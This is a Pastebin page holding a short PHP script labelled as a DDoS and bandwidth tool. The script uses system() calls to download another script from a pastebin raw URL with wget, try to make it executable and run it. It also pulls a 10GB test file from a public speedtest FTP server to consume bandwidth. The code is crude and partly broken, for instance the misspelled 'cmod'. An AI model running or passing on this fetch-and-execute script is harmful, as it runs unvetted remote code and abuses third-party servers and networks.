Advertisement
ardann

[DDoS] [Bandwitch] [Local Server]

Jan 2nd, 2018
723
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.40 KB | None | 0 0
  1. <?php
  2. // rename script to ddos.php
  3. // Target Download
  4. echo "Download file 10GB URL: ftp://speedtest:speedtest@ftp.otenet.gr/test10Gb.db";
  5. echo "The wget must ON";
  6. // PREPARING
  7. system("mkdir ddos && cd ddos");
  8. system("wget -O dds.php https://pastebin.com/raw/FTEw1mQk");
  9. system("cmod +x dds.php");
  10. system("wget -O pwn.db ftp://speedtest:speedtest@ftp.otenet.gr/test10Gb.db");
  11. system("php dds.php");
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement